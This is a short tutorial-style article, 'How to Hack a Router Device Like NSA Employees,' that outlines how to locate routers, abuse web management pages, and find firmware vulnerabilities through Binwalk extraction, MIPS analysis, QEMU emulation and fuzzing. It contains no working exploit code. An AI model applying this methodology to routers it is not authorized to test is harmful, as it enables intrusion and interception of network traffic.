How to Hack a Router Device Like NSA Employees
by Duran
The importance of routers for networks is self-evident.
Dominating the routing node means that you can control the flow of data. From a technical point-of-view, according to NSA's XKEYSCORE project, one of its missions is to gain the control of the routing node - in a nutshell, hack in router device.
This article will talk about the technical points of router hacking, but doesn't detail the technical explanation. The technology involved can be found on the Internet freely or, if you're interested in some tech points, you can find the answer from open sources.
How to Find a Router Device
You can use commands to seek active routers on the Internet, such as traceroute (Linux), tracert (Windows), or traceroute in Nmap. Of course, you can use some ready-made tools such as Shodan to find a specific objective. Moreover, if you're in field operation and the target has Wi-Fi, then the CIA's tool CHERRYBLOSSOM (please refer to WikiLeaks) comes in handy.
How to Hack It
Once the target is identified, the next step is trying to manipulate it by various means. Actually, we can find many true cases; the strongest fortress is broken from the inside. The mostly used method we can see is spear phishing. When you've got one machine in a LAN, then you can utilize it as a jump box to take over other network devices, including intranet routers. This article is not going to discuss aforementioned attack processes. If there was a router exposed on the public network, how do we capture it? Let's go and see how to gain the router's authority.
Management Page Exploit Method - In fact, this way is mainly thanks to the administrator not setting the router's public network access permission correctly (it's a good solution to turn on the router's SPI firewall). The attacker can access the router's management page (e.g. build with CGI, PHP, etc.) fully. So they can find vulnerabilities of the router webpage management system like Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), etc. Most of these vulnerabilities are caused by the page which does not filter input characters strictly, resulting in arbitrary command execution.
Firmware Exploit Method - This is the method to be emphasized. When you penetrate into an intranet and find a router, you will face privileges elevation problem, that is, gain root permission (not the admin credential that can be captured by a sniffer), and this is the thing that NSA's hackers would do.
The steps of digging for a router's firmware software vulnerability are as follows:
First, find the firmware of the router. You can get it from the manufacturer's official website or dump it from a router flash. The latter method requires you to be familiar with hardware and have good hands-on ability. Once you've got the firmware binary file, then you can use a powerful firmware file analysis tool like Binwalk to extract the SquashFS file system.
Second, analyze the source code and write an exploit tool. It is necessary that you have to know how to find software vulnerabilities and write exploit codes. If you don't know, you can find many tutorials on the Internet and learn it by yourself. But you have to realize that this is MIPS architecture rather than x86, so you also have to be able to read MIPS assembly instructions. And you have to know the difference between stack mechanism of MIPS and x86 so that could correctly construct buffer overflow, and still have to note the issue of big-endian and little-endian. Anyway, if you have mastered the exploit building on x86, it's almost the same on the MIPS platform theoretically. You just have to pay attention to what needs to be changed.
For example, you can use instruction int $0x80 on x86, but instead use the syscall instruction on MIPS. You can find shellcodes on Shellcodes Database for Study Cases where you can select which you want to use, then write an exploit tool by Python. Talk is cheap. Just visit RouterPWN to find more stuff for practice.
Third, build a testing environment. You need a Linux OS to run these works and, with that, you have to use QEMU VM to simulate running the program of the router file system. Besides IDA Pro for code debugging (you need to get MIPS plugins from github.com/tacnetsol/ida), you'll need fuzzing tools such as Sulley, SPIKE, Burp Suite, and sometimes Wireshark for capturing network data, etc.
We can use QEMU and IDA to debug the program locally or remotely. Just don't forget to set the processor type to MIPS in the IDA debugger setup option.
Summary
This article only describes the general idea of router hacking. Once you've gotten the skills of breaking firmware code, then you can do more things with router security. For instance, there's a backdoor that was exposed on a whole series of Netcore router products in 2014 - it is not a buffer overflow vulnerability, but it can be found through firmware code reverse.
In fact, NSA hackers are also doing these boring but exciting things, because we all know that "Vulnerability is King."